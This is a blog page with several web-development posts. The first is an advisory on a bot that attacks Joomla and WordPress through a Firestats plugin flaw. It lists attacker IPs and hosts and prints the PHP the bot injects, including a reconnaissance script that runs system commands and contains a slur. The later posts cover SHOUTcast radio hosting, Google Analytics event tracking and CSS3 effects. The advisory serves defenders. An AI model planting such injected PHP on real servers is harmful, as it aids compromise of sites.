Words from Alejandro U. Alvarez
Web-related
New threat for all Joomla and WordPress installations
Sep 24th
There is a new BOT out there, and one of the bad ones. I have started receiving traffic from it in my servers over the past week, and after some investigation it turns out it is quite a powerful bot, and so simple to use even a kid with a computer could use it.
The bot attacks mainly Joomla and WordPress installations, the Firestats plugin for WordPress version 1.6.2 has a known vulnerability that is exploited by this bot.
If successful, the bot will usually get your admin password and send it to a server somewhere, other versions f** your server up... it depends.
The bot is basically a top All-In-One product, that acts as a:
- RFI Scanner
- RFI Scan & Exploit
- Joomla RFI Scan & Exploit
- Milw0rm Search
- Google bypass
- Message Spy & Save
- Auto Spreading
The last known spreader for the bot is the Fx29Spreadz v1.0 (Apr. 2009) which can be used from a server with a PHP Shell.
IPs and servers:
This bot has used the following IPs and hosts (That I know of)
- 62.15.230.250
- 210.68.188.206
- 211.239.150.144
- 125.251.133.3
- 250.230.15.62.static.jazztel.es
- buminch.org
- www.framoss.ru
It has compromised servers in Republic of Korea, Taiwan and some other countries.
Injections:
The bot basically tries to insert the following PHP line:
< ?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>
Although there is another variation which inserts:
< ?php
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf(”%d b”, $number); }
if($len >= 4 && $len < =6) {
return sprintf(”%0.2f Kb”, $number/1024); }
if($len >= 7 && $len < =9) {
return sprintf(”%0.2f Mb”, $number/1024/1024); }
return sprintf(”%0.2f Gb”, $number/1024/1024/1024); }
echo “Osirys<br>”;
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo “0sirys was here and also is a fucking gay..”;
echo “uname -a: $un”;
echo “os: $os”;
echo “id: $id1”;
echo “free: $free”;
echo “used: $used”;
echo “total: $all”;
exit;
Security recommendations:
If your website runs on WordPress, Joomla, Drupal, or other popular CMS you must upgrade all plugins and check for the latest version of the system!
If you have Firestats I recommend deactivating it for some time, until a new version fixing that bug is released, and still, I would wait.
If you have URL rewriting systems, ensure they are up-to-date, and if you built them re-check the security, and never include external files.
Hope this helped you 
If you found any variations and new stuff about this please comment below
Online radio – Setting it up & hosting it
Jun 29th
Hi guys,
I'm sure someday we will work for someone who wants an online radio statio, well, this is a quick guide to those
Online radios:
Basically it is audio being broadcasted via the Internet. So that means that we generate an audio stream that listeners cannot control, other than pausing and resuming.
To launch one we need several things, to start off, we need a server with streaming capabilities. Since setting up a streaming server might be difficult, we will use a standard radio management program. The main ones are SHOUTcast, IceCast, Live365...
I will focus on SHOUTcast, since it is the most extended among web hosts.
Radio server: SHOUTcast
First off, we need a server to host our radio. Radio servers are not the same as standard web hosting servers, since they require a static IP for the radio, and streaming capacity. Most radio servers use SHOUTcast to manage the radio, and I personally recommend it for its easy of use.
From the SHOUTcast documentation:
"The magic of the SHOUTcast Radio system happens inside the SHOUTcast Radio Distributed Network Audio Software (DNAS). This software runs on a server attached to your IP network with lots of bandwidth, and is responsible for receiving audio from a broadcast source, updating the SHOUTcast Radio directory with information about what the broadcaster is sending, and sending the broadcast feed to listeners"
Finding a good hosting solution:
There are plenty of radio hostings out there, and finding the best one is almost impossible. There are some key things that we must always take into account:
- Bitrate: This means bits per second, or kilobits normally (kbps) It represents the audio quality, and the higher the better. 128kbps should be perfect for most stations.
- Bandwidth: This is the same as a standard web hosting server, but you must realize that the radio will be constantly streaming audio, so a huge bandwidth will be needed. 100Gb should be the least, and 300-500Gb will be perfect.
- Listeners: Online radios have a simultaneous listener limit, and that is a key factor when choosing a hosting plan. I strongly recommend a minimum of 50 listeners, although if you plan on growing 100-300 should be ok to start.
Disk space and other features such as PHP or MySQL are important as well, but nothing compared to the ones above. An ideal radio hosting plan should cost between 20-50$, have 128kbps, 300-500Gb, 500Gb bandwidth limit, and 400-600 listeners.
The one I prefer the most is GlowHost, which offers a great solution for SHOUTcast hosting, starting with a basic package at 25$/month, and 250 listeners.
Broadcasting
The nice thing about all this: Broadcasting from your home. And it is as simple as getting a program that works with broadcasting, there are 3 main ones:
- WinAmp: (Free) A standard audio player, that will let you play music to your radio as well as talk though a mic.
- Virtual DJ: (Commercial) Quite more sophisticated that WinAmp, it will allow you to do more complex mixes of the music, as well as talk via the mic.
- SAM Broadcaster: (Commercial) Probably the most professional solution for online radios, packed with features and goodies!
If you are going to broadcast from WinAmp you will first need to install the DSP plugin.
Also, take into account that when prompted for name and password, you can use any name you want, and then in the password field, you must write your username : and the password (i.e. username:password)
Important features
When setting up an online radio station it is vital to ensure that there will be something playing 24/7, so something like AutoDJ for SHOUTcast is perfect. AutoDJ will take all mp3 files in a folder you specify, and play them as a playlist any time there is no one broadcasting in your station, so it will fill up perfectly the spaces between shows and the times when there is no one available.
It is enabled in most radio hosts by default, and if it isn't you can normally request it free of charge. Setting it up is very easy, and it only requires having some mp3 files in a folder, that's why it is convenient to have enough disk space.
Playing the radio
SHOUTcast and most radio software include a set of scripts that will play the radio online, as well as showing information about current song, listener number... But they are not the best.
Ideally, you will include the radio in your website using a flash player, so that you can blend it nicely in the design. For this task I recommend the JW Player.
JW Player for online radio
In order to use it you must make sure SHOUTcast is set to stream in mp3. And then go to the link "Setup Flash Player". In the code they give you, you will find the radio address for the mp3 stream, it will look like this:
<div id="container"><a href="http://www.macromedia.com/go/getflashplayer">Get the Flash Player</a> to see this player.</div> <script type="text/javascript" src="swfobject.js"></script> <script type="text/javascript"> var s1 = new SWFObject("player.swf","ply","328","20","9","#FFFFFF"); s1.addParam("allowfullscreen","true"); s1.addParam("allowscriptaccess","always"); s1.addParam("flashvars","file=http://IP:PORT/;stream.nsv&type=mp3&volume=50&autostart=true"); s1.write("container"); </script>
Where it says IP and PORT, the corresponding IP and PORT of your radio will appear. You can directly embed this, or customize it. In order to do so, you can use the skings in the JW Player's website, or simply create yourself one, providing you have enough knowledge of Flash.
You're done!
If you still have any problems setting it up, or broadcasting, feel free to ask in the comments section below
Event tracking – Google Analytics
Jun 13th
Hello everyone,
As most people do, I'm sure you use Google Analytics for the stat metrics for some of your sites, so you'll love this new feature:
If you use AJAX in your site, or if you want to track outbound links, or downloads... etc then this is really useful for you.
What is event tracking?
In simple terms, it logs events that happen on your site, for example rate a post (If you have post rating), download a file... or you do some sort of JavaScript processing that you want to measure.
So finally, we can keep track of AJAX interactions with the server, we can log also normal POST requests that do some php processing, like posting a comment, or editing some data in our database.
Using Event Tracking:
This step couldn't be possible easier. First of all make sure you have the new code installed. The new code looks like this:
<script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-3181088-6"); pageTracker._trackPageview(); } catch(err) {}</script>
That var pageTracker is what holds the tracking object.
Example:
Imagine we have a site where we feature some sort of mp3 downloads. And we want to track those with Analytics. In the link to the file we would put:
<a href="song_file.mp3" title="Download file" onClick="pageTracker._trackEvent('Music', 'Download', 'Song number 4');">Download song</a>
As you can see we use the function _trackEvent, from the pageTracker object. This function takes 4 parameters, Category name, action name and a label and value:
_trackEvent(category, action, optional_label, optional_value)
The category can be used to store different events that are similar, for example in the category music we could use the actions Download, Listen, Rate... And finally the label, that is normally used to refer to which specific object in that category you are referring to, in this case which song.
From the Analytics panel
Wait for a day after you install this to see the data in Google Analytics, and then go to the stats panel, go to the Content tab, then you'll see at the bottom Event Tracking:
I've created a sample profile with some events and I clicked a couple times to show you how it looks like:
Screen capture of the Event Tracking page
Well I hope you found this useful, more information on the Google API
How do you use this?
Have you found any sort of smart uses for this? Please share with us
CSS3 New features – Interesting info ;)
Jun 11th
Hello fellow developers,
I'm sure all of you have heard of the "new" CSS3 stuff, it's been around for a while now, and it certainly has some very interesting new features.
First, I'll review some of the things that were the hardest to develop, yet they looked so damn well:
- Rounded corners - We all love them, but how hard is to find a good way to do them?
- Alpha transparency - PNGs, JavaScript tweaks... I must admit they are hard...
Plus, I'll show you how to create rounded+transparent borders!
Conclusion: The world needs new CSS features:
Solution: CSS3
Let's get going
Now before we get too exited, take into account that these new features "work" on major browsers, except obviously IE. So I would never use them for client sites... Meaning that you should only use these for personal designer portfolios, where you want to impress colleagues.
So now that this was clear, let's see how the new stuff goes:
Rounded corners:
For this you only have to select the element and use the following CSS code:
#example{ -moz-border-radius: 20px; -webkit-border-radius: 20px; }
Demonstration:
Example Div (CSS code for it below)
CSS for the example:
background-color:#FFFFFF; border:#CCCCCC solid 2px; -moz-border-radius: 20px; -webkit-border-radius: 20px; padding:30px; text-align:center;
For more options go to the official CSS3 specs page for rounded corners
Transparency
This one is one of my favorites, combined with rounded corners
The way it works is simple, you can make any background color transparent by using one of several methods, I will show you the one I consider the easiest.
You know how in normal CSS we can select colors via the RGB color code, as in:
color: rgb(0,0,0);
Well, in CSS3 we can now add a fourth parameter, that will contain the alpha information, from 0 to 1.
Demonstration:
Example div. CSS for it below
CSS for the example above:
background-color:rgba(0,0,0,0.5); color:#000; padding:30px; margin:20px; border:#CCCCCC solid 2px; text-align:center;
This effect won't look as cool here, because the background is a plain color. Use it over textured backgrounds for a great effect!
Rounded+transparent borders!
These really look amazing, rounded, transparent borders! Take a look at a live example
Unluckily, we cannot use rbga() colors on borders, but there is a simple workaround, embed the div you want with another one, with a padding of the size of the border (It looks better with larger borders)
Demonstration:
Example CSS below
CSS for the example above:
DIV 1 (Outer div) - Note the bigger radius
margin:20px; padding:20px; background-color:rgba(0,0,0,0.5); -moz-border-radius: 30px; -webkit-border-radius: 30px;
DIV 2 (Inner div)
padding:20px; text-align:center; background-color:#FFFFFF; color:#333333; -moz-border-radius: 20px; -webkit-border-radius: 20px;
Well, I hope you found this interesting!
Show us your uses!
Have you already implemented any of these techniques? Please show us!
Comment below with the URL of the site where you used the new features of CSS3